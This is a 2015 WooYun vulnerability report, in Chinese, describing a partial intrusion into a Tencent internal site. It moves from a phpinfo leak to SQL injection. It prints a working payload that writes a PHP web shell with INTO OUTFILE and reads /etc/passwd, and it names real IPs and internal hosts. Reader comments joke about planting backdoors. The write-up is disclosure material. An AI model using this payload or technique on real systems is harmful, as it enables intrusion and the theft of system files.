缺陷编号:WooYun-2015-0121069
漏洞标题:从一个phpinfo到一次半途而废的腾讯内网漫游之旅
相关厂商:腾讯
漏洞作者:举起手来
提交时间:2015-06-17 10:19
公开时间:2015-06-17 10:47
漏洞类型:SQL注射漏洞
危害等级:低
自评Rank:1
漏洞状态:厂商已经修复
Tags标签:
2015-06-17: 细节已通知厂商并且等待厂商处理中
2015-06-17: 厂商已经确认,细节仅向厂商公开
2015-06-17: 厂商已经修复漏洞并主动公开,细节向公众公开
从一个phpinfo到一次半途而废的腾讯内网漫游之旅;哎,腾讯反应有点快啊,搞了一会,吃个饭回来;尼玛下线了。卧槽啊,分享下思路。
一、扫到了腾讯几个小问题,比如phpinfo之类的:
二、深入(一波三折)从上面扫到的几个漏洞来看,183.61.39.187这个IP存在两个web目录:
1 2 |
http://183.61.39.187/brand/<br> http://183.61.39.187/sola/ |
其中这个http://183.61.39.187/brand/ 就是一哥日过的那个ycg.qq.com;当时我访问到这个,我都惊呆了,知道有戏;然而,我选择了http://183.61.39.187/sola/这个,因为上面那个目录并没有什么卵用。这个sola是他们内部一些搞设计的自己搭的站,访问首页直接尼玛跳到
1 |
http://passport.oa.com/modules/passport/signin.ashx?url=http://isux.oa.com/sola/ |
然而,根据我多年的经验,这特么是个内部用的站啊。passport.oa.com是腾讯内部统一认证登陆的接口。好,紧接着我屏蔽这个跳转,发现首页是一个上传,兴奋。。。结果,尼玛竟然不能传php,撸了几种上传姿势,硬是没搞定,上传接口如下:
1 2 3 4 5 6 7 |
<form action="http://isux.oa.com/sola/upload.php" method="post"<br> enctype="multipart/form-data"><br> <label for="file">Filename:</label><br> <input type="file" name="files[]" /><br> <br /><br> <input type="submit" name="submit" value="Submit" /><br> </form> |
但是,但是我抓到一个另外的接口
1 |
http://isux.oa.com/sola/server/showPic.phpuser= |
恩,很不错,存在注入漏洞。那么我来写个文件试试;web目录是我从phpinfo里看到的—_-!
1 2 |
http://isux.oa.com/sola/server/showPic.php<br> user=1' union select 1,"<?php system('ps aux')?>",load_file('/etc/passwd'),4,5,6,7,8,9,0 into outfile "/data/imgcache/htdocs/sola/public/1k23hj1k22b.php" -- ; |
竟然上传成功了,惊呆了
好了,饿了,回家吃饭,结果,吃完饭回来,尼玛下线了,,,
已经下线了。。。
危害等级:低
漏洞Rank:1
确认时间:2015-06-1710:33
非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。
2015-06-17:渗透行为发生时被安全系统检测到,业务已下线
速度不错
说了多少次,千万不要phpinfo..........
检测到就能给1分了?
说了多少次,千万不要phpinfo.......... 关键字被检测到了
他们有“洋葱”
腾讯牛逼啊
你好1分
卧槽 就1分
检测到了就给1分?2333333333
waf认识你了,小哥。
听说请求腾讯的站加上各种关键字,腾讯某些人就得忙起来,不知道这是不是真的..
又学习新姿势了...
渗透行为发生时被安全系统检测到,业务已下线
尼玛好强大!
我比较好奇这个 oa你是怎么跳转进去的
吃个饭回来;尼玛下线了。卧槽啊
说了多少次,千万不要phpinfo..........
记住了,下次搞站的时候,备好干粮,去吃啥饭嘛!!
才一分啊,大腾讯太小气了吧,啥理由也没有就1分?大家都别去tsrc了,直接发贴分享吧!
@PgHook 9494放个后门再去吃啊
腾讯的内网敏感,下次还是不要提交tsrc直接发出来分享吧
NB!
喜欢这个节奏,速度公开
牛逼 一提交就公开
每次搞到**洞 还没提交 就已经检测到 然后给修复 在提交忽略的说
渗透行为发生时被就被检测到了,这系统厉害啊
速度真快
哈哈哈哈 吃个饭下线了
老大说了:腾讯牛逼啊
腾讯这反映略快啊
记住了,下次搞站的时候,备好干粮,去吃啥饭嘛!!
以后要拼手速的
这时候你会发现一个妹纸多么重要了,当你撸站饿了的时候她主动给你送来饭,让你张嘴喂你吃,伙计,你缺的不是技术,缺的是送饭的妹纸啊!!!
用1分来说明下“安全系统”,然而这有卵用?
洞主, 这说明不了什么,,这说明腾讯还给你挖洞的机会。。。加油看好你
渗透行为发生时被安全系统检测到,业务已下线,还是腾讯牛逼!
学习了
渗透行为发生时被安全系统检测到,业务已下线
渗透行为发生时被安全系统检测到,业务已下线
这洞不止1rank吧,虽然已经被检测到了
@ucifer 检测到了说明这种方式的攻击是可控的,在实际环境中危害并不是很大,但1rank确实不太合理
23333真是到爆炸啊= =可能因为是业务及时下架,所以才给1分吧
才一分啊,大腾讯太小气了吧,啥理由也没有就1分?大家都别去tsrc了,直接发贴分享吧!
检测到就能给1分了?
@jeary 一有关键字就人工检测,这劳动力有点大啊...
原文连接
的情况下转载,若非则不得使用我方内容。